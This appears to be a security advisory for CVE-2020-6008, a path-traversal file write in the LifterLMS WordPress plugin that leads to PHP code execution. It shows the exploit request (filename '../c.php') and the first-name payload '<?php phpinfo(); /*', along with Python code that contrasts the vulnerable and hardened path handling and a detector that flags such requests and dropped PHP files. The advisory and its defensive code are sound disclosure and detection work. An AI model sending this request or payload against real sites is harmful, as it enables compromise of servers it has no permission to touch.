# CVE-2020-6008
LifterLMS • < 3.37.15 • Arbitrary File Write
Reported on 27-Mar-2020 by [Omri Herscovici](/researcher/Omri Herscovici), [Sagi Tzadik](/researcher/Sagi Tzadik)
CPR-ID: 2148
Upload Date: 04-Aug-20
## Information
The `export_admin_table` function in the `LLMS_AJAX_Handler` class is
vulnerable to an arbitrary file write that leads to RCE on the WordPress server.
A registered student can send an Ajax request with `?action=export_admin_table`;
when combined with `&handler=Course_Students`, this calls
`LLMS_Table_Student_Course->generate_export_file` (defined in the parent class).
The `generate_export_file` function opens a file handle on a path controlled by
the user through the `&filename` parameter of the Ajax request, so `../` walks
out of the export directory and the caller also chooses the extension.
The following request, sent with the student's logged-in session cookies, creates
a file named `c.php` in the WordPress `uploads` folder (the nonce can be copied
from any other legitimate Ajax request):

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

action=export_admin_table&lesson_id=485&quiz_id=487&_ajax_nonce=[Get from legitimate request]&post_id=254&handler=Course_Students&filename=../c.php&student=5&course_id=482
```
The file created contains all students enrolled in the course given by
`&course_id=`. The student can see which courses they are enrolled in, set
`course_id` to one of them, and change their own first name on the profile page
to `BBBBB<?php phpinfo(); /*`.
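The filename sink described above, modelled in Python as an added example (illustration code, not LifterLMS's own code and not its 3.37.15 fix): the vulnerable path join beside a hardened one, run against a throwaway directory tree. The `llms-exports` directory name and the column set are assumptions; the payload cell is the one from this advisory.

```python
import csv
import os
import posixpath
import re
import tempfile

# Constructed export rows modelled on the advisory's output; only the attacker-
# controlled "First Name" cell matters. Not data captured from a real site.
SAMPLE_ROWS = [
    ["id", "Last Name", "First Name", "Email", "Status"],
    ["5", "student one", "BBBBB<?php phpinfo(); /*", "a@ab.com", "Enrolled"],
]


def vulnerable_export_path(export_dir, filename):
    """Models the sink in the advisory: the request's `filename` parameter is
    joined to the export directory unchanged, so "../" walks out of it and the
    attacker also picks the extension (here .php instead of .csv)."""
    return os.path.normpath(os.path.join(export_dir, filename))


def hardened_export_path(export_dir, filename):
    """Hardened counterpart (illustration, not the vendor's patch): drop any
    directory component, keep only the text before the first dot restricted to
    a conservative character set, always append .csv, and confirm the resolved
    path is still inside export_dir (defence in depth against symlinks)."""
    base = posixpath.basename(filename.replace("\\", "/"))
    stem = re.sub(r"[^A-Za-z0-9_-]", "", base.split(".", 1)[0])
    if not stem:
        raise ValueError("export filename rejected: %r" % filename)
    root = os.path.realpath(export_dir)
    candidate = os.path.realpath(os.path.join(root, stem + ".csv"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("export path escapes %s" % root)
    return candidate


def write_export(path, rows):
    """Writes the rows as CSV the way an export routine would: cells are quoted
    as needed but never filtered, so the PHP open tag reaches the file verbatim."""
    with open(path, "w", newline="") as fh:
        csv.writer(fh).writerows(rows)
    with open(path) as fh:
        return fh.read()


def demo(filename="../c.php"):
    """Runs both variants against a throwaway tree shaped like
    uploads/llms-exports/ (directory name assumed) and reports where each
    would have written the attacker's file."""
    uploads = tempfile.mkdtemp()
    export_dir = os.path.join(uploads, "llms-exports")
    os.makedirs(export_dir)
    vuln = vulnerable_export_path(export_dir, filename)
    content = write_export(vuln, SAMPLE_ROWS)
    result = {
        "vulnerable_path": vuln,
        "vulnerable_escaped": os.path.dirname(vuln) != export_dir,
        "vulnerable_has_php_tag": "<?php" in content,
        "hardened_path": None,
        "hardened_escaped": None,
    }
    try:
        safe = hardened_export_path(export_dir, filename)
        result["hardened_path"] = safe
        result["hardened_escaped"] = os.path.dirname(safe) != os.path.realpath(export_dir)
    except ValueError as exc:
        result["hardened_error"] = str(exc)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-22s %s" % (key, value))
```

Taking the stem before the first dot, rather than just stripping a trailing `.php`, is deliberate: it also removes double extensions such as `c.php.csv`, which some Apache `AddHandler` configurations would still pass to PHP.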
This would create a file similar to this one in the file system:

```csv
id,"Last Name","First Name",Email,Status,"Enrollment Updated",Completed,Progress,Grade
5,"student one","BBBBB<?php phpinfo(); /*",a@ab.com,Enrolled,"March 26, 2020","March 26, 2020",100%,50%
```
PHP emits everything outside `<?php ... ?>` tags verbatim, so the CSV header and
the quoted cell prefix are just text output, while the trailing `/*` opens a
comment that swallows the rest of the file. Simply browsing to
`http://example.com/wordpress/wp-content/uploads/c.php` therefore executes the
PHP code stored in the student's first name, effectively achieving full code
execution on the server. (On PHP releases that treat an unterminated block
comment as a parse error rather than a compile warning, the comment would have
to be closed with a `*/` later in the file.)
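For detection and response, an added Python example (not from the advisory or the plugin): one function classifies an `admin-ajax.php` POST body, flagging `export_admin_table` calls whose `filename` traverses or does not end in `.csv`, and a second walks an uploads tree for dropped files that carry an executable extension or a PHP open tag. The request bodies, the fixture files and the set of PHP-handled extensions are constructed assumptions; the `c.php` content is the advisory's.

```python
import os
import re
import tempfile
from urllib.parse import parse_qs

# Open tags PHP will execute; "<?xml" is deliberately not matched.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.IGNORECASE)
# Extensions assumed to be handed to the PHP handler; adjust to the server config.
EXECUTABLE_EXTS = {".php", ".phtml", ".php5", ".php7", ".phar"}

# Constructed admin-ajax POST bodies (not captured traffic): the advisory's
# request with a placeholder nonce, and a legitimate export for comparison.
ATTACK_BODY = ("action=export_admin_table&handler=Course_Students"
               "&filename=../c.php&course_id=482&_ajax_nonce=0123456789")
BENIGN_BODY = ("action=export_admin_table&handler=Course_Students"
               "&filename=students.csv&course_id=482&_ajax_nonce=0123456789")


def classify_export_request(body):
    """Inspects a form-encoded admin-ajax body and returns a list of findings
    for export_admin_table calls whose filename could not be an ordinary CSV
    export. An empty list means nothing suspicious."""
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != "export_admin_table":
        return []
    name = params.get("filename", "")
    findings = []
    if ".." in name or "/" in name or "\\" in name:
        findings.append("path traversal in filename: %r" % name)
    if "\x00" in name:
        findings.append("NUL byte in filename: %r" % name)
    if name and not name.lower().endswith(".csv"):
        findings.append("non-CSV export filename: %r" % name)
    return findings


def find_dropped_php(uploads_dir):
    """Walks an uploads tree and reports files that either carry an executable
    extension or contain a PHP open tag, noting whether the file starts like a
    LifterLMS export so the CVE-2020-6008 artefact stands out."""
    hits = []
    for dirpath, _, files in os.walk(uploads_dir):
        for fn in files:
            path = os.path.join(dirpath, fn)
            ext = os.path.splitext(fn)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(64 * 1024)
            has_tag = PHP_OPEN_TAG.search(head) is not None
            if ext in EXECUTABLE_EXTS or has_tag:
                hits.append({
                    "name": fn,
                    "path": path,
                    "executable_ext": ext in EXECUTABLE_EXTS,
                    "php_tag": has_tag,
                    "looks_like_export": head.split(b"\n", 1)[0].startswith(b"id,"),
                })
    return sorted(hits, key=lambda h: h["path"])


def build_fixture():
    """Creates a throwaway uploads tree with constructed files: the dropped
    c.php from the advisory, a harmless image, and a CSV that merely contains a
    short open tag. Returns the directory path."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "2020", "03"))
    samples = {
        "c.php": (b'id,"Last Name","First Name",Email,Status\n'
                  b'5,"student one","BBBBB<?php phpinfo(); /*",a@ab.com,Enrolled\n'),
        os.path.join("2020", "03", "photo.jpg"): b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",
        "report.csv": b'name,note\nbob,"<?= 1 ?>"\n',
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    print(classify_export_request(ATTACK_BODY))
    for hit in find_dropped_php(build_fixture()):
        print(hit)
```

The request check needs the POST body, which ordinary access logs do not record; feed it from a WAF audit log or a request-capturing hook. The file scan reports a `.csv` containing an open tag as well, since that file becomes dangerous the moment any other bug lets it be renamed or included.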
**References:**
<https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-plugins>